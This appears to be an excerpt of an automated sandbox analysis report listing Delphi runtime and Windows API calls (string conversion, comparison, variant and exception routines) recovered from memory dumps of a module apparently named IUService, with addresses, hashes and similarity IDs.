                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A117
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A12B
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A135
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?), ref: 5001A142
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2845561448-0
                                                                                                                                            • Opcode ID: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                                                            • Instruction ID: 557e5c510faaf08c59fda0598d3fc89e05443d392f4ccd520a77b62b8c30d619
                                                                                                                                            • Opcode Fuzzy Hash: a637fd93928d4bcc59d4fbf31d7dd1fda35c7064787cfb8b0e7d3fb8d7a31359
                                                                                                                                            • Instruction Fuzzy Hash: 2F219331B003A5ABEF11DAB4DC52A5AB7F8EF49200F514272EA00E7246E770EE85C690
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A268
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A272
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A28F
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2B7
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2CB
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2D5
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A30A,?,?,?,00000000,00000000), ref: 5001A2E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1C0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1E8
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A238), ref: 5001A1FC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A238), ref: 5001A206
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A238), ref: 5001A213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AA8
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                              • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC1
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC9
                                                                                                                                              • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE1
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE9
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B07
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4E2
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4F4
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4FD
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D508
                                                                                                                                              • Part of subcall function 5000CE0C: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,?,5000D50D,?,00000000,5000D54A), ref: 5000CE34
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D519
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D525
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D52F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B31F
                                                                                                                                            • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B336
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B34D
                                                                                                                                            • @System@@CopyArray$qqrv.RTL120(?,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B386
                                                                                                                                            • @System@@CopyRecord$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B39A
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3B5
                                                                                                                                            • @System@@DynArrayAsg$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4C0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4DF
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5000B53E), ref: 5000B4F5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B47B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B512
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,5003297A,?,?), ref: 500328B0
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5003297A,?,?), ref: 500328BB
                                                                                                                                            • @Sysutils@TryStrToInt64$qqrx20System@UnicodeStringrj.RTL120(00000000,5003297A,?,?), ref: 500328C6
                                                                                                                                              • Part of subcall function 5001B578: @System@@ValInt64$qqrx20System@UnicodeStringri.RTL120(?,?,50031C83,500328CB,00000000,5003297A,?,?), ref: 5001B583
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(?,?), ref: 5003291A
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50032981,?), ref: 50032974
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                            • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B01
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015B90), ref: 50015B12
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50015B90), ref: 50015B19
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B38
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028602
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028622
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                                                              • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028648
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028651
                                                                                                                                            • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 5002865B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500168EE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                                                              • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                                                              • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                                                              • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001690C
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016914
                                                                                                                                              • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001693A
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016942
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 50031445
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(00000000,00000000,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003144A
                                                                                                                                              • Part of subcall function 50031010: VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                                                              • Part of subcall function 50031010: @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003146B
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031489
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,50035537,?,?), ref: 5003549F
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500354B1
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354DD
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354EF
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,50035537,?,?), ref: 500354FA
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(5003551C,00000000,50035537,?,?), ref: 5003550F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA02
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002C9FD
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002CA27
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA2C
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002CA38
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA59
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Move$qqrpxvpviRecpx14$Asg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 443726296-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A700
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A736), ref: 5001A71B
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$System@@$String$AnsiEnsureFromStr$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Copy$qqrx20InternalStringiiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1585887659-0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,50033649,?,?), ref: 500335B8
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?), ref: 500335EF
                                                                                                                                            • @Sysutils@TryStrToFloat$qqrx20System@UnicodeStringrg.RTL120(?,?), ref: 500335FA
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 50033626
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50033650), ref: 50033643
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@UnicodeWide$Check$qqrlususClr$qqrpvDataFloat$qqrx20FromResultStr$qqrr17Str$qqrr20StringStringrgStringrx8Stringx17Sysutils@Variants@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2425264070-0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,500330EA,?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000), ref: 50033057
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 50033099
                                                                                                                                            • @Sysutils@TryStrToBool$qqrx20System@UnicodeStringro.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330A4
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330B9
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330C7
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(500330F1,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000,?,50032154,00000000), ref: 500330E4
                                                                                                                                            Similarity
